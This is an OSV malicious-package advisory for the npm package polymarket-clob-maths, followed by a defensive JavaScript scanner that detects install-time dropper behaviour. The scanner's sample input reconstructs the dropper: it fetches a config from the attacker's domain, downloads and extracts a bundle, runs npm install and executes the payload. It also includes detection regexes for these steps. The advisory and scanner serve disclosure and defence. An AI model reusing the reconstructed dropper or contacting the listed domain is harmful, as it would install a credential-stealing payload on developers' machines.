{"id":"MAL-2026-6691","summary":"Malicious code in polymarket-clob-maths (npm)","details":"Malicious npm package published as part of a coordinated DeFi-themed infostealer campaign targeting Polymarket developers. `polymarket-clob-maths` uses a dropper technique: a `postinstall` hook fetches a remote bundle from `trabalhos-flax.vercel.app` and executes a `syncSession()` function that runs a second-stage infostealer. The payload harvests cryptocurrency wallet vaults, browser credentials, SSH keys, AWS credentials, developer secrets, and password manager databases, then exfiltrates the data to the attacker-controlled C2.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (9e5747b377bb17f8131b894ccdae41919423fb3c8a77d286084bcfaf9654e4ac)\nOn npm install, the declared postinstall hook (node scripts/install-check.cjs) fetches a JSON config from https://trabalhos-flax.vercel.app/config/clob-math.json, parses a bundle URL from the response, downloads a tgz to a temp directory, extracts it, runs `npm install` inside the extracted directory, then require()s peer-math.js from that bundle and invokes syncSession(). The fetched archive is unpinned, has no integrity check (no hash, no signature), and is hosted on a third-party Vercel app unrelated to Polymarket. The attacker fully controls the executed code on each install, and can change it at any time without republishing the npm package. The package additionally impersonates the Polymarket / @polymarket CLOB ecosystem: the published name is `polymarket-clob-maths` while the README is titled `polymarket-stake-math` and instructs users to `npm install polymarket-stake-math`, indicating namespace confusion against the legitimate Polymarket tooling. 
Cover-story naming (PSM_PEER_URL, KELLY_PEER_CONFIG, log strings calling the operation an `install check` / `peer sync`) and silenced errors (`console.warn('[polymarket-stake-math] install check skipped:', msg)`) hide the dropper behavior from a casual installer.\n","modified":"2026-07-01T21:16:42.501992335Z","published":"2026-06-30T00:00:00Z","database_specific":{"malicious-packages-origins":[{"versions":["3.3.9"],"sha256":"233e641c7fca2c1ff2f63a05777ad23c3fbd13c3a14071569ddc95368794862d","modified_time":"2026-07-01T20:37:40Z","id":"IN-MAL-2026-007887","import_time":"2026-07-01T21:04:20.144159826Z","source":"amazon-inspector"},{"versions":["2.3.9"],"sha256":"9e5747b377bb17f8131b894ccdae41919423fb3c8a77d286084bcfaf9654e4ac","modified_time":"2026-07-01T20:37:48Z","id":"IN-MAL-2026-007888","import_time":"2026-07-01T21:04:20.210934065Z","source":"amazon-inspector"}]},"references":[{"type":"REPORT","url":"https://safedep.io/defi-infostealer-fake-arbitrage-bot-npm/"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/polymarket-clob-maths/v/3.3.9"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/polymarket-clob-maths/v/2.3.9"}],"affected":[{"package":{"name":"polymarket-clob-maths","ecosystem":"npm","purl":"pkg:npm/polymarket-clob-maths"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"}]}],"versions":["3.3.9","2.3.9"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/polymarket-clob-maths/MAL-2026-6691.json","indicators":{"package_integrity":[{"hashes":{"sha512_sri":"sha512-2r4jpAM871TzVxWKLZCTslvYp93rjQ9YDIYCmtCT/Is4Ulk035CJR3veBdv1tGtwHiUC2DtLigTsdbQAONDS5A==","sha1":"89f890724fd26e1c8fad6f582188530d1b5c05fd"},"filename":"polymarket-clob-maths-3.3.9.tgz"}],"evidence_files":[{"sha256":"6802db59168709186a085f1bf6c162288ae0482d66a35816bda9f0704d0b709b","tlsh":"59a1459519a2727746b1ebb8c722901dfe2340233521c350f6de96952fb72a4c352dec","path":"scripts/install-check.cjs"},{"sha256":"6c66f29924a4968ae15f898d5b
4ef4245302f64a9179593429a69283c8e8473d","tlsh":"d9f07237daa04e3668b88f9d4e681604f4680b1f32b04d0bb0bba01c0fb2273045b73a","path":"package.json"}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}],"iocs":{"domains":["trabalhos-flax.vercel.app"]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"SafeDep","contact":["https://safedep.io"],"type":"FINDER"}]}
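The dropper chain in the details above (a postinstall hook that fetches an unpinned, unsigned remote bundle, extracts it, runs `npm install` in it and require()s the result, with the README advertising a different package name) is a pattern that can be caught before the hook ever runs. The following is an added example, not the advisory's, Amazon Inspector's or the package's own code: a heuristic scanner over an unpacked package that flags lifecycle hooks, network and execution indicators in the hook's script, and README/package.json name mismatches. The indicator names, the sample package (modelled on the described behaviour, not the real `scripts/install-check.cjs`) and the clean control package are all assumptions made for this example.

```javascript
// Added example, not code from the advisory or from the package it describes.
// Heuristic pre-install scanner for an unpacked npm package: takes a map of file
// path -> contents and reports the dropper pattern described in the advisory plus a
// README whose advertised name differs from the published one. Indicator names and
// the sample inputs below are assumptions made for this example.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Each regex is an indicator, not proof: a hit means "read this script before installing".
const SCRIPT_INDICATORS = [
  { code: "remote-url", re: /https?:\/\/[^\s'"`]+/g },
  { code: "network-fetch", re: /\b(fetch|https?\.get|https?\.request|axios)\s*\(/g },
  { code: "archive-extract", re: /\btar(\s+-?x\w*|\.x\b|\.extract\b)|\.tgz\b|\.tar\.gz\b/g },
  { code: "spawns-npm", re: /\b(execSync|exec|spawn|spawnSync)\s*\(\s*['"`]npm\b/g },
  { code: "dynamic-require", re: /\brequire\s*\(\s*[^'"`\s)]/g }, // require(<expression>), not a literal
  { code: "tmpdir-use", re: /\btmpdir\s*\(\)|\/tmp\//g },
  { code: "silenced-error", re: /\bcatch\b[^{]*\{\s*(console\.(warn|log)\(|\})/g }, // failures hidden as a warning
];

function scanPackage(files) {
  const findings = [];
  const pkg = JSON.parse(files["package.json"]);
  const scripts = pkg.scripts || {};

  // 1. Every lifecycle hook runs arbitrary code on `npm install`; record it and, when it
  //    invokes a script file shipped in the package, scan that file's source.
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (!command) continue;
    findings.push({ code: "lifecycle-hook", hook, command });
    const m = /\bnode\s+(\S+)/.exec(command);
    const file = m ? m[1].replace(/^\.\//, "") : null;
    if (!file) continue;
    const source = files[file];
    if (source === undefined) {
      findings.push({ code: "missing-script", hook, file });
      continue;
    }
    for (const { code, re } of SCRIPT_INDICATORS) {
      const hits = source.match(re);
      if (hits) findings.push({ code, hook, file, samples: hits.slice(0, 3) });
    }
  }

  // 2. Names the README tells users to install, or uses as its title, that differ from
  //    package.json's name: the cover-story / namespace-confusion signal from the advisory.
  const readme = files["README.md"] || "";
  const advertised = new Set();
  for (const m of readme.matchAll(/npm\s+(?:install|i|add)\s+(@?[\w.-]+(?:\/[\w.-]+)?)/g)) advertised.add(m[1]);
  const title = /^#\s+(\S+)/m.exec(readme);
  if (title) advertised.add(title[1]);
  for (const name of advertised) {
    if (name !== pkg.name) findings.push({ code: "name-mismatch", published: pkg.name, advertised: name });
  }
  return findings;
}

// Verdict used to block the install: a lifecycle hook whose script reaches the network
// and then executes something it did not ship with (dynamic require or a spawned npm).
function isRemoteDropper(findings) {
  const codes = new Set(findings.map((f) => f.code));
  const fetches = codes.has("remote-url") || codes.has("network-fetch");
  const executes = codes.has("dynamic-require") || codes.has("spawns-npm");
  return codes.has("lifecycle-hook") && fetches && executes;
}

// Constructed sample input modelled on the behaviour the advisory describes. It is not the
// real scripts/install-check.cjs; the URL is the advisory's IOC, present only as a string
// to be scanned, and nothing in it is executed.
const SAMPLE_PACKAGE = {
  "package.json": JSON.stringify({
    name: "polymarket-clob-maths",
    version: "3.3.9",
    scripts: { postinstall: "node scripts/install-check.cjs" },
  }),
  "README.md": "# polymarket-stake-math\n\nnpm install polymarket-stake-math\n",
  "scripts/install-check.cjs": [
    "const os = require('os'); const path = require('path'); const fs = require('fs');",
    "const { execSync } = require('child_process');",
    "const PSM_PEER_URL = 'https://trabalhos-flax.vercel.app/config/clob-math.json';",
    "async function installCheck() {",
    "  const cfg = await (await fetch(PSM_PEER_URL)).json();",
    "  const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'peer-'));",
    "  fs.writeFileSync(path.join(dir, 'bundle.tgz'), Buffer.from(await (await fetch(cfg.bundle)).arrayBuffer()));",
    "  execSync('tar -xzf bundle.tgz', { cwd: dir });",
    "  execSync('npm install', { cwd: dir });",
    "  require(path.join(dir, 'peer-math.js')).syncSession();",
    "}",
    "installCheck().catch((e) => { console.warn('[polymarket-stake-math] install check skipped:', e.message); });",
  ].join("\n"),
};

// Constructed control: no install hooks, README matches the published name.
const CLEAN_PACKAGE = {
  "package.json": JSON.stringify({ name: "example-clean-lib", version: "1.0.0" }),
  "README.md": "# example-clean-lib\n\nnpm install example-clean-lib\n",
};

const report = scanPackage(SAMPLE_PACKAGE);
console.log(JSON.stringify(report, null, 2), "\nremote dropper:", isRemoteDropper(report));
```

To run it against a real candidate, `npm pack <name>@<version>` and `tar -xzf` the tarball into a directory, read the extracted files into the map and call `scanPackage`. The scan only tells you what the published tarball would do at install time; because the fetched bundle is unpinned and unsigned, what actually executes on a given day is whatever the attacker's host serves. Independently of any scanner, installing with `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) would have kept this package's `postinstall` hook from running at all.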